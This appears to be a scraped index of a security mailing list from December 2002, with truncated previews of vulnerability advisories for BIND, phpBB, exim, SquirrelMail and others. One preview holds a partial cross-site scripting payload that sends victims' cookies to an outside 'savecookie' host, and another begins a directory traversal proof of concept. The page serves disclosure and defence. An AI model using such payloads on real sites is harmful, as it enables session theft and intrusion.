|
|
Colapse all |
Post message
BIND Name Server DNS Spoofing Vulnerability on IRIX 2002-12-05 SGI Security Coordinator (agent99 sgi com) Proxy vulnerability in TrendMicro InterScan-VirusWall V3.6 2002-12-05 Volker Tanger (volker tanger discon de) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Greetings! A quite well known (i.e. ancient) type of proxy vulnerability was found for TrendMicro's InterScan VirusWall V3.6 This general problem has been known to be an issue with plain HTTP proxies like the Squid for ages (e.g. http://www.squid-cac [ more ] [ reply ] Cross-site Scripting Vulnerability in phpBB 2.0.3 2002-12-03 Fabricio Angeletti (f_a_a yahoo com) Hello :) here is the code ---------------- <html> <body> <form method="post" name="search" action="http://target/search.php?mode=searchuser"> <input type="hidden" name="search_username" value=""/> </form> <SCRIPT> search.search_username.value='Http://savecookie/x.php?Cookie="><script>l ocation=sear [ more ] [ reply ] [Fwd: [RHSA-2002:196-09] Updated xinetd packages fix denial ofservice vulnerability] 2002-12-04 Dan Rowles (d rowles outcometechnologies com) On October 15th, Redhat sent a post to BugTraq advising users of Xinetd to upgrade to 2.3.9-0.xx Their latest post (3rd December) advises people to "upgrade" to 2.3.7-4.xx Can anyone from RedHat please comment on what people who have already got 2.3.9 installed should do from here? Do we need to f [ more ] [ reply ] Notes on MS02-068, extensive downplaying of severity 2002-12-05 Thor Larholm (thor pivx com) Following the release of the cumulative MS02-066 patch from the previous week, Microsoft has released yet another cumulative patch for Internet Explorer - MS02-068, which can be found at http://www.microsoft.com/technet/security/bulletin/MS02-068.asp The sole vulnerability that MS02-068 patches is [ more ] [ reply ] [SECURITY] [DSA 204-1] New kdlibs packages fix arbitrary program execution 2002-12-05 joey infodrom org (Martin Schulze) Apache/Tomcat Denial Of Service And Information Leakage Vulnerability 2002-12-04 alias securityfocus com Sygate Personal Firewall can be shut down without a need to supply a password - although one is required 2002-12-04 Eitan Caspi (eitancaspi yahoo com) Tested and affected software: Sygate Personal Firewall 5.0 build 1150s (The free version) installed on Windows XP Pro with SP1 Summary: Sygate personal firewall has an option to ask for a password before entering various sections of the application or making some actions (like moving between pr [ more ] [ reply ] Buffer Overflow Vulnerability in X Font Server on IRIX 2002-12-04 SGI Security Coordinator (agent99 sgi com) Multiple Vulnerabilities in BIND Name Service Daemon on IRIX 2002-12-04 SGI Security Coordinator (agent99 sgi com) Windows XP Disclosure of Registered AP Information 2002-12-04 snsadv lac co jp ------------------------------------------------------------------------ -- SNS Advisory No.60 Windows XP Disclosure of Registered AP Information Problem first discovered: 30 Aug 2002 Published: 4 Dec 2002 http://www.lac.co.jp/security/english/snsadv_e/60_e.html ------------------------------------- [ more ] [ reply ] [SECURITY] [DSA 203-1] New smb2www packages fix arbitrary command execution 2002-12-04 joey infodrom org (Martin Schulze) Security Update: [CSSA-2002-055.0] Linux: RPC XDR buffer overflow 2002-12-04 security caldera com To: bugtraq (at) securityfocus (dot) com [email concealed] announce (at) lists.caldera (dot) com [email concealed] security-alerts (at) linuxsecurity (dot) com [email concealed] full-disclosure (at) lists.netsys (dot) com [email concealed] ________________________________________________________________________ ______ SCO Security Advisory Subject: Linux: RPC XDR buffer overflow Advisory number: CSSA-2002 [ more ] [ reply ] Security Update: [CSSA-2002-054.0] Linux: exploitable memory leak in ypserv 2002-12-04 security caldera com To: bugtraq (at) securityfocus (dot) com [email concealed] announce (at) lists.caldera (dot) com [email concealed] security-alerts (at) linuxsecurity (dot) com [email concealed] full-disclosure (at) lists.netsys (dot) com [email concealed] ________________________________________________________________________ ______ SCO Security Advisory Subject: Linux: exploitable memory leak in ypserv Advisory number: [ more ] [ reply ] SAP database local root via symlink 2002-12-04 KF (dotslash snosoft com) Hey folks, During an evaluation of the SAP database for linux I located a security issue in one of their suid binaries. This issue is a symlink attack against a binary that makes an execve call to a file in your current directory. The details of this issue are outlined below. You should be a [ more ] [ reply ] Local root vulnerability found in exim 4.x (and 3.x) 2002-12-04 Wana Thomas (01psi194 fhwn ac at) (1 replies) Overview -------- A local root vulnerability has been discovered in Exim 4.x (4.10 verified and exploit available) and in Exim 3.x (3.35 verified). Impact ------ The vulnerability can only be exploited by the "admin user" of exim, who is determined by compiled-in values. Thus the RISK of this vul [ more ] [ reply ] Re: Local root vulnerability found in exim 4.x (and 3.x) 2002-12-05 Tabor J. Wells (twells fsckit net) (1 replies) Re: Local root vulnerability found in exim 4.x (and 3.x) 2002-12-05 Tabor J. Wells (twells fsckit net) [CLA-2002:551] Conectiva Linux Security Announcement - pine 2002-12-04 secure conectiva com br -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ -- CONECTIVA LINUX SECURITY ANNOUNCEMENT - ------------------------------------------------------------------------ -- PACKAGE : pine SUMMARY : Denial of Service (DoS) DATE [ more ] [ reply ] Fw: CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service 2002-12-02 Muhammad Faisal Rauf Danka (mfrd attitudex com) (1 replies) -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service Original release date: November 25, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Sun Micros [ more ] [ reply ] Re: Fw: CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service 2002-12-03 Jim Knoble (jmknoble pobox com) Zeroo Webserver remote directory traversal exploit 2002-12-03 Mike Cramp (mikecc uc zemos net) Hey guys, A while back there was that directory traversal exploit for the Zeroo webserver. (http://lonerunner.cfxweb.net) Here is a proof of concept code, enjoy. /* * zeroo httpd remote directory traversal exploit * proof of concept * hehe, just a copy and paste from my other directory * [ more ] [ reply ] SquirrelMail v1.2.9 XSS bugs 2002-12-03 euronymous (just-a-user yandex ru) (1 replies) =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: SquirrelMail v1.2.9 XSS bugs product: SquirrelMail v1.2.9 vendor: www.squirrelmail.org risk: low date: 12/3/2k2 discovered by: euronymous /F0KP /HACKRU Team advisory url: http://f0kp.iplus.ru/bz/008.txt =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:= [ more ] [ reply ] [SECURITY] [DSA 202-1] New IM packages fix insecure temporary file creation 2002-12-03 joey infodrom org (Martin Schulze) |
|
Privacy Statement |
PRODUCT.
akfingerd (http://synflood.at/akfingerd/)
EXPLOIT-ID.
ECSC Ltd. Official K-R4d E-Security Advertisory.
KR4D-VULN-ID-0-000-000-000-000-000-000-000-001
IMPORTANT SOUNDING DESCRIPTION.
Akfingerd is a 'secure' finger server used by noone blah blah..
[ more ] [ reply ]